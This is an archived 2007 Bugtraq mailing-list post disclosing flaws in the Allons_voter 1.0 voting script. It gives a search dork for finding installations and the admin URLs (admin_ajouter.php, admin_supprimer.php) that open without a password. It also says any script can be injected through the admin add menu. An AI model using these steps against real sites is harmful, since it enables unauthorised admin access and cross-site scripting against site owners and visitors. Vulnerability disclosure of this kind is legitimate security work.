| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070209232558.23697.qmail@securityfocus.com>
Date: 9 Feb 2007 23:25:58 -0000
From: sn0oPy.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Allons_voter Version 1.0 xss and admin votes
* Allons_voter Version 1.0 xss and admin votes wihtout password
* By : sn0oPy
* Risk : medium
* Dork : inurl:"Allons_voter"
* exploit :
Be admin :
http://www.target.com/Allons_voter/menu.html
replace it by
http://www.target.com/Allons_voter/admin_ajouter.php
or http://www.target.com/Allons_voter/admin_supprimer.php
+ inject any script on the admin add menu.
* contact : sn0oPy@...nir-geopolitique.net
* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).
Réference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2641